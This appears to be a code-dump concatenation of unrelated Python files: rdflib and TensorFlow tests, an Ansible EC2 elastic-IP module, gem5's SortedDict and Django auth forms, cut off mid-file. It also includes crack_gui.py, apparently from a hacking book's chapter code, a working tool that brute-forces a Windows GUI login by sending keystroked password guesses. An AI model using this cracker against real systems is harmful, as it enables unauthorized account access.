# should skip to ns4 when ns3 is already assigned
g.bind("ns3", URIRef("http://example.org/"))
self.assertEqual(g.compute_qname(URIRef("http://blip/blop")),
("ns4", URIRef("http://blip/"), "blop"))
def test_n3(self):
g = Graph()
g.add((URIRef("http://example.com/foo"),
URIRef("http://example.com/bar"),
URIRef("http://example.com/baz")))
n3 = g.serialize(format="n3")
# Gunnar disagrees that this is right:
# self.assertTrue("<http://example.com/foo> ns1:bar <http://example.com/baz> ." in n3)
# as this is much prettier, and ns1 is already defined:
self.assertTrue(b("ns1:foo ns1:bar ns1:baz .") in n3)
def test_n32(self):
# this test not generating prefixes for subjects/objects
g = Graph()
g.add((URIRef("http://example1.com/foo"),
URIRef("http://example2.com/bar"),
URIRef("http://example3.com/baz")))
n3 = g.serialize(format="n3")
self.assertTrue(b("<http://example1.com/foo> ns1:bar <http://example3.com/baz> .") in n3)
|
rabipanda/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distributions/python/kernel_tests/conditional_distribution_test.py
|
135
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Bernoulli distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import distributions
from tensorflow.contrib.distributions.python.kernel_tests import distribution_test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import test
class ConditionalDistributionTest(distribution_test.DistributionTest):
def _GetFakeDistribution(self):
class _FakeDistribution(distributions.ConditionalDistribution):
"""Fake Distribution for testing _set_sample_static_shape."""
def __init__(self, batch_shape=None, event_shape=None):
self._static_batch_shape = tensor_shape.TensorShape(batch_shape)
self._static_event_shape = tensor_shape.TensorShape(event_shape)
super(_FakeDistribution, self).__init__(
dtype=dtypes.float32,
reparameterization_type=distributions.NOT_REPARAMETERIZED,
validate_args=True,
allow_nan_stats=True,
name="DummyDistribution")
def _batch_shape(self):
return self._static_batch_shape
def _event_shape(self):
return self._static_event_shape
def _sample_n(self, unused_shape, unused_seed, arg1, arg2):
raise ValueError(arg1, arg2)
def _log_prob(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _prob(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _cdf(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _log_cdf(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _log_survival_function(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _survival_function(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
return _FakeDistribution
def testNotImplemented(self):
d = self._GetFakeDistribution()(batch_shape=[], event_shape=[])
for name in ["sample", "log_prob", "prob", "log_cdf", "cdf",
"log_survival_function", "survival_function"]:
method = getattr(d, name)
with self.assertRaisesRegexp(ValueError, "b1.*b2"):
method([] if name == "sample" else 1.0, arg1="b1", arg2="b2")
if __name__ == "__main__":
test.main()
|
HackingWithPython/Chapter_Source_Code
|
refs/heads/master
|
Chapter_4/crack_gui.py
|
1
|
import win32gui, win32com.client
import time, sys, re, argparse
from itertools import chain, product
from datetime import datetime
class SendKeys:
def __init__ (self):
self.obj = win32com.client.Dispatch("WScript.Shell")
def send (self, data):
self.obj.SendKeys(data, 0)
def run (self, path):
self.obj.Run(path)
self.obj.AppActivate("IFT 5.7 Login")
class WinMan:
def __init__ (self):
self.handle = None
def fndWin(self, classname, windowname):
self.handle = win32gui.FindWindow(classname, windowname)
def winEnumCallBack(self, hwnd, regex):
if re.match(regex, str(win32gui.GetWindowText(hwnd))) != None:
self.handle = hwnd
def searchWin(self, regex):
self.handle = None
win32gui.EnumWindows(self.winEnumCallBack, regex)
class glob: # Response Text
wm = WinMan()
sk = SendKeys()
invalid = "Invalid Login" # Window Title
valid = ".*IFT.*" # Window Title using regex
found = False
# Iterable Method for brute-forcing a character set and length
def bruteforce(charset, maxlength, minlength):
return (''.join(candidate)
for candidate in chain.from_iterable(product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
def crack(args, pwd): # Method for trying passwords
try:
if args.verbose:
print ("[-] Trying: " + pwd.strip())
glob.sk.send(args.username + "{TAB}" + pwd + "{TAB}{ENTER}")
time.sleep(.05)
# Look for failed response text in title
glob.wm.fndWin(None, glob.invalid)
if glob.wm.handle > 0: # If hwnd > 0, we found it
glob.sk.send("{ENTER}{TAB}^a{BS}{TAB}^a{BS}{TAB}{TAB}")
else: # Look for window containing valid response
glob.wm.searchWin(glob.valid)
if glob.wm.handle > 0:
print ("[+] Password: " + pwd)
glob.found = True
else:
print ("[!] Unable to locate known windows. Manually verify successful login.")
print ("[?] Potential Password: " + pwd)
except Exception as err:
print (str(err))
def main(args):
cnt = 0
start = datetime.now()
print ("==================================================")
print ("Started @ " + str(start))
print ("==================================================")
glob.sk.run(args.path)
time.sleep(.5)
if args.wordlist == None:
# No wordlist, perform bruteforce
for pwd in bruteforce(args.charset, int(args.maxlen),int(args.minlen)): # Launch brute-force
if glob.found: break # Stop if password found
if args.prefix: # Prefix string to password
pwd = str(args.prefix) + pwd
if args.postfix: #Postfix string to password
pwd += str(args.postfix)
crack(args, pwd) # Launch Crack
cnt += 1
else:
# Open password list
with open(args.wordlist) as fle:
for pwd in fle: # Loop through passwords
if glob.found: break
pwd = pwd.strip()
crack(args, pwd.strip()) # Launch Crack
cnt += 1
stop = datetime.now()
persec = str(cnt/((stop - start).total_seconds()))
print ("==================================================")
print ("Attack Duration: " + str(stop - start))
print ("Crack Attempts: " + str(cnt) + " @ " + str(persec) + " per second")
print ("==================================================")
if __name__ == "__main__":
# Declare an argparse variable to handle application command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("path", action="store", help="full path to executable")
parser.add_argument("username", action="store", help="username to crack")
parser.add_argument("-w", "--wordlist", action="store", help="wordlist of passwords")
parser.add_argument("-c", "--charset", action="store", help="character set")
parser.add_argument("-x", "--maxlen", action="store", help="maximum password length",
nargs='?', default=8, const=8, type=int)
parser.add_argument("-m","--minlen", action="store",
nargs='?', default=1, const=1, help="minimum password length", type=int)
parser.add_argument("-r","--prefix", action="store", help="prefix each password")
parser.add_argument("-o","--postfix", action="store", help="postfix each password")
parser.add_argument("-v", "--verbose", action="store", help="verbose output",
nargs='?', default=False, const=True)
if len(sys.argv[2:])==0: # Show help if required arg not included
parser.print_help()
parser.exit()
args = parser.parse_args() # Declare argumnets object to args
if (args.minlen or args.maxlen) and (args.minlen > args.maxlen):
parser.print_help()
print ("\n** Argument Logic Error **")
print ("Minimum password length [-m "+str(args.minlen)+"] is greater than Password length [-x "+str(args.maxlen)+"]\n")
parser.exit()
main(args)
|
j00bar/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/amazon/ec2_eip.py
|
78
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = '''
---
module: ec2_eip
short_description: manages EC2 elastic IP (EIP) addresses.
description:
- This module can allocate or release an EIP.
- This module can associate/disassociate an EIP with instances or network interfaces.
version_added: "1.4"
options:
device_id:
description:
- The id of the device for the EIP. Can be an EC2 Instance id or Elastic Network Interface (ENI) id.
required: false
aliases: [ instance_id ]
version_added: "2.0"
public_ip:
description:
- The IP address of a previously allocated EIP.
- If present and device is specified, the EIP is associated with the device.
- If absent and device is specified, the EIP is disassociated from the device.
required: false
aliases: [ ip ]
state:
description:
- If present, allocate an EIP or associate an existing EIP with a device.
- If absent, disassociate the EIP from the device and optionally release it.
required: false
choices: ['present', 'absent']
default: present
in_vpc:
description:
- allocate an EIP inside a VPC or not
required: false
default: false
version_added: "1.4"
reuse_existing_ip_allowed:
description:
- Reuse an EIP that is not associated to a device (when available), instead of allocating a new one.
required: false
default: false
version_added: "1.6"
release_on_disassociation:
description:
- whether or not to automatically release the EIP when it is disassociated
required: false
default: false
version_added: "2.0"
private_ip_address:
description:
- The primary or secondary private IP address to associate with the Elastic IP address.
required: False
default: None
version_added: "2.3"
extends_documentation_fragment:
- aws
- ec2
author: "Rick Mendes (@rickmendes) <rmendes@illumina.com>"
notes:
- This module will return C(public_ip) on success, which will contain the
public IP address associated with the device.
- There may be a delay between the time the EIP is assigned and when
the cloud instance is reachable via the new address. Use wait_for and
pause to delay further playbook execution until the instance is reachable,
if necessary.
- This module returns multiple changed statuses on disassociation or release.
It returns an overall status based on any changes occurring. It also returns
individual changed statuses for disassociation and release.
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: associate an elastic IP with an instance
ec2_eip:
device_id: i-1212f003
ip: 93.184.216.119
- name: associate an elastic IP with a device
ec2_eip:
device_id: eni-c8ad70f3
ip: 93.184.216.119
- name: disassociate an elastic IP from an instance
ec2_eip:
device_id: i-1212f003
ip: 93.184.216.119
state: absent
- name: disassociate an elastic IP with a device
ec2_eip:
device_id: eni-c8ad70f3
ip: 93.184.216.119
state: absent
- name: allocate a new elastic IP and associate it with an instance
ec2_eip:
device_id: i-1212f003
- name: allocate a new elastic IP without associating it to anything
ec2_eip:
state: present
register: eip
- name: output the IP
debug:
msg: "Allocated IP is {{ eip.public_ip }}"
- name: another way of allocating an elastic IP without associating it to anything
ec2_eip:
state: 'present'
- name: provision new instances with ec2
ec2:
keypair: mykey
instance_type: c1.medium
image: ami-40603AD1
wait: yes
group: webserver
count: 3
register: ec2
- name: associate new elastic IPs with each of the instances
ec2_eip:
device_id: "{{ item }}"
with_items: "{{ ec2.instance_ids }}"
- name: allocate a new elastic IP inside a VPC in us-west-2
ec2_eip:
region: us-west-2
in_vpc: yes
register: eip
- name: output the IP
debug:
msg: "Allocated IP inside a VPC is {{ eip.public_ip }}"
'''
try:
import boto.ec2
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
class EIPException(Exception):
pass
def associate_ip_and_device(ec2, address, private_ip_address, device_id, check_mode, isinstance=True):
if address_is_associated_with_device(ec2, address, device_id, isinstance):
return {'changed': False}
# If we're in check mode, nothing else to do
if not check_mode:
if isinstance:
if address.domain == "vpc":
res = ec2.associate_address(device_id, allocation_id=address.allocation_id, private_ip_address=private_ip_address)
else:
res = ec2.associate_address(device_id, public_ip=address.public_ip, private_ip_address=private_ip_address)
else:
res = ec2.associate_address(network_interface_id=device_id, allocation_id=address.allocation_id, private_ip_address=private_ip_address)
if not res:
raise EIPException('association failed')
return {'changed': True}
def disassociate_ip_and_device(ec2, address, device_id, check_mode, isinstance=True):
if not address_is_associated_with_device(ec2, address, device_id, isinstance):
return {'changed': False}
# If we're in check mode, nothing else to do
if not check_mode:
if address.domain == 'vpc':
res = ec2.disassociate_address(
association_id=address.association_id)
else:
res = ec2.disassociate_address(public_ip=address.public_ip)
if not res:
raise EIPException('disassociation failed')
return {'changed': True}
def _find_address_by_ip(ec2, public_ip):
try:
return ec2.get_all_addresses([public_ip])[0]
except boto.exception.EC2ResponseError as e:
if "Address '{}' not found.".format(public_ip) not in e.message:
raise
def _find_address_by_device_id(ec2, device_id, isinstance=True):
if isinstance:
addresses = ec2.get_all_addresses(None, {'instance-id': device_id})
else:
addresses = ec2.get_all_addresses(None, {'network-interface-id': device_id})
if addresses:
return addresses[0]
def find_address(ec2, public_ip, device_id, isinstance=True):
""" Find an existing Elastic IP address """
if public_ip:
return _find_address_by_ip(ec2, public_ip)
elif device_id and isinstance:
return _find_address_by_device_id(ec2, device_id)
elif device_id:
return _find_address_by_device_id(ec2, device_id, isinstance=False)
def address_is_associated_with_device(ec2, address, device_id, isinstance=True):
""" Check if the elastic IP is currently associated with the device """
address = ec2.get_all_addresses(address.public_ip)
if address:
if isinstance:
return address and address[0].instance_id == device_id
else:
return address and address[0].network_interface_id == device_id
return False
def allocate_address(ec2, domain, reuse_existing_ip_allowed):
""" Allocate a new elastic IP address (when needed) and return it """
if reuse_existing_ip_allowed:
domain_filter = {'domain': domain or 'standard'}
all_addresses = ec2.get_all_addresses(filters=domain_filter)
if domain == 'vpc':
unassociated_addresses = [a for a in all_addresses
if not a.association_id]
else:
unassociated_addresses = [a for a in all_addresses
if not a.instance_id]
if unassociated_addresses:
return unassociated_addresses[0]
return ec2.allocate_address(domain=domain)
def release_address(ec2, address, check_mode):
""" Release a previously allocated elastic IP address """
# If we're in check mode, nothing else to do
if not check_mode:
if not address.release():
EIPException('release failed')
return {'changed': True}
def find_device(ec2, module, device_id, isinstance=True):
""" Attempt to find the EC2 instance and return it """
if isinstance:
try:
reservations = ec2.get_all_reservations(instance_ids=[device_id])
except boto.exception.EC2ResponseError as e:
module.fail_json(msg=str(e))
if len(reservations) == 1:
instances = reservations[0].instances
if len(instances) == 1:
return instances[0]
else:
try:
interfaces = ec2.get_all_network_interfaces(network_interface_ids=[device_id])
except boto.exception.EC2ResponseError as e:
module.fail_json(msg=str(e))
if len(interfaces) == 1:
return interfaces[0]
raise EIPException("could not find instance" + device_id)
def ensure_present(ec2, module, domain, address, private_ip_address, device_id,
reuse_existing_ip_allowed, check_mode, isinstance=True):
changed = False
# Return the EIP object since we've been given a public IP
if not address:
if check_mode:
return {'changed': True}
address = allocate_address(ec2, domain, reuse_existing_ip_allowed)
changed = True
if device_id:
# Allocate an IP for instance since no public_ip was provided
if isinstance:
instance = find_device(ec2, module, device_id)
if reuse_existing_ip_allowed:
if instance.vpc_id and len(instance.vpc_id) > 0 and domain is None:
raise EIPException("You must set 'in_vpc' to true to associate an instance with an existing ip in a vpc")
# Associate address object (provided or allocated) with instance
assoc_result = associate_ip_and_device(ec2, address, private_ip_address, device_id,
check_mode)
else:
instance = find_device(ec2, module, device_id, isinstance=False)
# Associate address object (provided or allocated) with instance
assoc_result = associate_ip_and_device(ec2, address, private_ip_address, device_id,
check_mode, isinstance=False)
if instance.vpc_id:
domain = 'vpc'
changed = changed or assoc_result['changed']
return {'changed': changed, 'public_ip': address.public_ip, 'allocation_id': address.allocation_id}
def ensure_absent(ec2, domain, address, device_id, check_mode, isinstance=True):
if not address:
return {'changed': False}
# disassociating address from instance
if device_id:
if isinstance:
return disassociate_ip_and_device(ec2, address, device_id,
check_mode)
else:
return disassociate_ip_and_device(ec2, address, device_id,
check_mode, isinstance=False)
# releasing address
else:
return release_address(ec2, address, check_mode)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
device_id=dict(required=False, aliases=['instance_id']),
public_ip=dict(required=False, aliases=['ip']),
state=dict(required=False, default='present',
choices=['present', 'absent']),
in_vpc=dict(required=False, type='bool', default=False),
reuse_existing_ip_allowed=dict(required=False, type='bool',
default=False),
release_on_disassociation=dict(required=False, type='bool', default=False),
wait_timeout=dict(default=300),
private_ip_address=dict(required=False, default=None, type='str')
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
ec2 = ec2_connect(module)
device_id = module.params.get('device_id')
instance_id = module.params.get('instance_id')
public_ip = module.params.get('public_ip')
private_ip_address = module.params.get('private_ip_address')
state = module.params.get('state')
in_vpc = module.params.get('in_vpc')
domain = 'vpc' if in_vpc else None
reuse_existing_ip_allowed = module.params.get('reuse_existing_ip_allowed')
release_on_disassociation = module.params.get('release_on_disassociation')
# Parameter checks
if private_ip_address is not None and device_id is None:
module.fail_json(msg="parameters are required together: ('device_id', 'private_ip_address')")
if instance_id:
warnings = ["instance_id is no longer used, please use device_id going forward"]
is_instance = True
device_id = instance_id
else:
if device_id and device_id.startswith('i-'):
is_instance = True
elif device_id:
if device_id.startswith('eni-') and not in_vpc:
module.fail_json(msg="If you are specifying an ENI, in_vpc must be true")
is_instance = False
try:
if device_id:
address = find_address(ec2, public_ip, device_id, isinstance=is_instance)
else:
address = False
if state == 'present':
if device_id:
result = ensure_present(ec2, module, domain, address, private_ip_address, device_id,
reuse_existing_ip_allowed, module.check_mode, isinstance=is_instance)
else:
address = allocate_address(ec2, domain, reuse_existing_ip_allowed)
result = {'changed': True, 'public_ip': address.public_ip, 'allocation_id': address.allocation_id}
else:
if device_id:
disassociated = ensure_absent(ec2, domain, address, device_id, module.check_mode, isinstance=is_instance)
if release_on_disassociation and disassociated['changed']:
released = release_address(ec2, address, module.check_mode)
result = {'changed': True, 'disassociated': disassociated, 'released': released}
else:
result = {'changed': disassociated['changed'], 'disassociated': disassociated, 'released': {'changed': False}}
else:
address = find_address(ec2, public_ip, None)
released = release_address(ec2, address, module.check_mode)
result = {'changed': released['changed'], 'disassociated': {'changed': False}, 'released': released}
except (boto.exception.EC2ResponseError, EIPException) as e:
module.fail_json(msg=str(e))
if instance_id:
result['warnings'] = warnings
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import * # noqa
from ansible.module_utils.ec2 import * # noqa
if __name__ == '__main__':
main()
|
samueldotj/TeeRISC-Simulator
|
refs/heads/master
|
src/python/m5/util/sorteddict.py
|
84
|
# Copyright (c) 2006-2009 Nathan Binkert <nate@binkert.org>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bisect import bisect_left, bisect_right
class SortedDict(dict):
def _get_sorted(self):
return getattr(self, '_sorted', sorted)
def _set_sorted(self, val):
self._sorted = val
self._del_keys()
sorted = property(_get_sorted, _set_sorted)
@property
def _keys(self):
try:
return self._sorted_keys
except AttributeError:
_sorted_keys = self.sorted(dict.iterkeys(self))
self._sorted_keys = _sorted_keys
return _sorted_keys
def _left_eq(self, key):
index = self._left_ge(self, key)
if self._keys[index] != key:
raise KeyError(key)
return index
def _right_eq(self, key):
index = self._right_le(self, key)
if self._keys[index] != key:
raise KeyError(key)
return index
def _right_lt(self, key):
index = bisect_left(self._keys, key)
if index:
return index - 1
raise KeyError(key)
def _right_le(self, key):
index = bisect_right(self._keys, key)
if index:
return index - 1
raise KeyError(key)
def _left_gt(self, key):
index = bisect_right(self._keys, key)
if index != len(self._keys):
return index
raise KeyError(key)
def _left_ge(self, key):
index = bisect_left(self._keys, key)
if index != len(self._keys):
return index
raise KeyError(key)
def _del_keys(self):
try:
del self._sorted_keys
except AttributeError:
pass
def __repr__(self):
return 'SortedDict({%s})' % ', '.join('%r: %r' % item
for item in self.iteritems())
def __setitem__(self, key, item):
dict.__setitem__(self, key, item)
self._del_keys()
def __delitem__(self, key):
dict.__delitem__(self, key)
self._del_keys()
def clear(self):
self.data.clear()
self._del_keys()
def copy(self):
t = type(self)
return t(self)
def keys(self):
return self._keys[:]
def values(self):
return list(self.itervalues())
def items(self):
return list(self.iteritems())
def iterkeys(self):
return iter(self._keys)
def itervalues(self):
for k in self._keys:
yield self[k]
def iteritems(self):
for k in self._keys:
yield k, self[k]
def keyrange(self, start=None, end=None, inclusive=False):
if start is not None:
start = self._left_ge(start)
if end is not None:
if inclusive:
end = self._right_le(end)
else:
end = self._right_lt(end)
return iter(self._keys[start:end+1])
def valuerange(self, *args, **kwargs):
for k in self.keyrange(*args, **kwargs):
yield self[k]
def itemrange(self, *args, **kwargs):
for k in self.keyrange(*args, **kwargs):
yield k, self[k]
def update(self, *args, **kwargs):
dict.update(self, *args, **kwargs)
self._del_keys()
def setdefault(self, key, _failobj=None):
try:
return self[key]
except KeyError:
self[key] = _failobj
def pop(self, key, *args):
try:
dict.pop(self, key)
self._del_keys()
except KeyError:
if not args:
raise
return args[0]
def popitem(self):
try:
key = self._keys[0]
self._del_keys()
except IndexError:
raise KeyError('popitem(): dictionary is empty')
else:
return key, dict.pop(self, key)
@classmethod
def fromkeys(cls, seq, value=None):
d = cls()
for key in seq:
d[key] = value
return d
if __name__ == '__main__':
def display(d):
print d
print d.keys()
print list(d.iterkeys())
print d.values()
print list(d.itervalues())
print d.items()
print list(d.iteritems())
d = SortedDict(x=24,e=5,j=4,b=2,z=26,d=4)
display(d)
print 'popitem', d.popitem()
display(d)
print 'pop j'
d.pop('j')
display(d)
d.setdefault('a', 1)
d.setdefault('g', 7)
d.setdefault('_')
display(d)
d.update({'b' : 2, 'h' : 8})
display(d)
del d['x']
display(d)
d['y'] = 26
display(d)
print `d`
print d.copy()
for k,v in d.itemrange('d', 'z', inclusive=True):
print k,v
|
uiri/pxqz
|
refs/heads/master
|
venv/lib/python2.7/site-packages/django/contrib/auth/forms.py
|
65
|
from django import forms
from django.forms.util import flatatt
from django.template import loader
from django.utils.encoding import smart_str
from django.utils.http import int_to_base36
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.contrib.auth.hashers import UNUSABLE_PASSWORD, is_password_usable, get_hasher
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import get_current_site
UNMASKED_DIGITS_TO_SHOW = 6
mask_password = lambda p: "%s%s" % (p[:UNMASKED_DIGITS_TO_SHOW], "*" * max(len(p) - UNMASKED_DIGITS_TO_SHOW, 0))
class ReadOnlyPasswordHashWidget(forms.Widget):
def render(self, name, value, attrs):
encoded = value
if not is_password_usable(encoded):
return "None"
final_attrs = self.build_attrs(attrs)
encoded = smart_str(encoded)
if len(encoded) == 32 and '$' not in encoded:
algorithm = 'unsalted_md5'
else:
algorithm = encoded.split('$', 1)[0]
try:
hasher = get_hasher(algorithm)
except ValueError:
summary = "<strong>Invalid password format or unknown hashing algorithm.</strong>"
else:
summary = ""
for key, value in hasher.safe_summary(encoded).iteritems():
summary += "<strong>%(key)s</strong>: %(value)s " % {"key": ugettext(key), "value": value}
return mark_safe("<div%(attrs)s>%(summary)s</div>" % {"attrs": flatatt(final_attrs), "summary": summary})
class ReadOnlyPasswordHashField(forms.Field):
widget = ReadOnlyPasswordHashWidget
def __init__(self, *args, **kwargs):
kwargs.setdefault("required", False)
super(ReadOnlyPasswordHashField, self).__init__(*args, **kwargs)
class UserCreationForm(forms.ModelForm):
"""
A form that creates a user, with no privileges, from the given username and
password.
"""
error_messages = {
'duplicate_username': _("A user with that username already exists."),
'password_mismatch': _("The two password fields didn't match."),
}
username = forms.RegexField(label=_("Username"), max_length=30,
regex=r'^[\w.@+-]+$',
help_text = _("Required. 30 characters or fewer. Letters, digits and "
"@/./+/-/_ only."),
error_messages = {
'invalid': _("This value may contain only letters, numbers and "
"@/./+/-/_ characters.")})
password1 = forms.CharField(label=_("Password"),
widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password confirmation"),
widget=forms.PasswordInput,
help_text = _("Enter the same password as above, for verification."))
class Meta:
model = User
fields = ("username",)
def clean_username(self):
# Since User.username is unique, this check is redundant,
# but it sets a nicer error message than the ORM. See #13147.
username = self.cleaned_data["username"]
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise forms.ValidationError(self.error_messages['duplicate_username'])
def clean_password2(self):
password1 = self.cleaned_data.get("password1", "")
password2 = self.cleaned_data["password2"]
if password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password2
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
username = forms.RegexField(
label=_("Username"), max_length=30, regex=r"^[\w.@+-]+$",
help_text = _("Required. 30 characters or fewer. Letters, digits and "
"@/./+/-/_ only."),
error_messages = {
'invalid': _("This value may contain only letters, numbers and "
"@/./+/-/_ characters.")})
password = ReadOnlyPasswordHashField(label=_("Password"),
help_text=_("Raw passwords are not stored, so there is no way to see "
"this user's password, but you can change the password "
"using <a href=\"password/\">this form</a>."))
def clean_password(self):
return self.initial["password"]
class Meta:
model = User
def __init__(self, *args, **kwargs):
super(UserChangeForm, self).__init__(*args, **kwargs)
f = self.fields.get('user_permissions', None)
if f is not None:
f.queryset = f.queryset.select_related('content_type')
class AuthenticationForm(forms.Form):
"""
Base class for authenticating users. Extend this to get a form that accepts
username/password logins.
"""
username = forms.CharField(label=_("Username"), max_length=30)
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
error_messages = {
'invalid_login': _("Please enter a correct username and password. "
"Note that both fields are case-sensitive."),
'no_cookies': _("Your Web browser doesn't appear to have cookies "
"enabled. Cookies are required for logging in."),
'inactive': _("This account is inactive."),
}
def __init__(self, request=None, *args, **kwargs):
"""
If request is passed in, the form will validate that cookies are
enabled. Note that the request (a HttpRequest object) must have set a
cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
running this validation.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if username and password:
self.user_cache = authenticate(username=username,
password=password)
if self.user_cache is None:
raise forms.ValidationError(
self.error_messages['invalid_login'])
elif not self.user_cache.is_active:
raise forms.ValidationError(self.error_messages['inactive'])
self.check_for_test_cookie()
return self.cleaned_data
def check_for_test_cookie(self):
if self.request and not self.request.session.test_cookie_worked():
raise forms.ValidationError(self.error_messages['no_cookies'])
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
class PasswordResetForm(forms.Form):
error_messages = {
'unknown': _("That e-mail address doesn't have an associated "
"user account. Are you sure you've registered?"),
'unusable': _("The user account associated with this e-mail "
"address cannot reset the password."),
}
email = forms.EmailField(label=_("E-mail"), max_length=75)
def clean_email(self):
"""
Validates that an active user exists with the given email address.
"""
email = self.cleaned_data["email"]
self.users_cache = User.objects.filter(email__iexact=email,
is_active=True)
if not len(self.users_cache):
raise forms.ValidationError(self.error_messages['unknown'])
if any((user.password == UNUSABLE_PASSWORD)
for user in self.users_cache):
raise forms.ValidationError(self.error_messages['unusable'])
return email
def save(self, domain_override=None,
subject_template_name='registration/password_reset_subject.txt',
email_template_name='registration/password_reset_email.html',
use_https=False, token_generator=default_token_generator,
from_email=None, request=None):
"""
Generates a one-use only link for resetting password and sends to the
user.
"""
from django.core.mail import send_mail
for user in self.users_cache:
if not domain_override:
current_site = get_current_site(request)
site_name = current_site.name
domain = current_site.domain
else:
site_name = domain = domain_override
c = {
'email': user.email,
'domain': domain,
'site_name': site_name,
'uid': int_to_base36(user.id),
'user': user,
'token': token_generator.make_token(user),
'protocol': use_https and 'https' or 'http',
}
subject = loader.render_to_string(subject_template_name, c)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
email = loader.render_to_string(email_template_name, c)
send_mail(subject, email, from_email, [user.email])
class SetPasswordForm(forms.Form):
"""
A form that lets a user change set his/her password without entering the
old password
"""
error_messages = {
'password_mismatch': _("The two password fields didn't match."),
}
new_password1 = forms.CharField(label=_("New password"),
widget=forms.PasswordInput)
new_password2 = forms.CharField(label=_("New password confirmation"),
widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super(SetPasswordForm, self).__init__(*args, **kwargs)
def clean_new_password2(self):
password1 = self.cleaned_data.get('new_password1')
password2 = self.cleaned_data.get('new_password2')
if password1 and password2:
if password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password2
def save(self, commit=True):
self.user.set_password(self.cleaned_data['new_password1'])
if commit:
self.user.save()
return self.user
class PasswordChangeForm(SetPasswordForm):
"""
A form that lets a user change his/her password by entering
their old password.
"""
error_messages = dict(SetPasswordForm.error_messages, **{
'password_incorrect': _("Your old password was entered incorrectly. "
"Please enter it again."),
})
old_password = forms.CharField(label=_("Old password"),
widget=forms.PasswordInput)
def clean_old_password(self):
"""
Validates that the old_password field is correct.
"""
old_password = self.cleaned_data["old_password"]
if not self.user.check_password(old_password):
raise forms.ValidationError(
self.error_messages['password_incorrect'])
return old_password
PasswordChangeForm.base_fields.keyOrder = ['old_password', 'new_password1',
'new_password2']
class AdminPasswordChangeForm(forms.Form):
"""
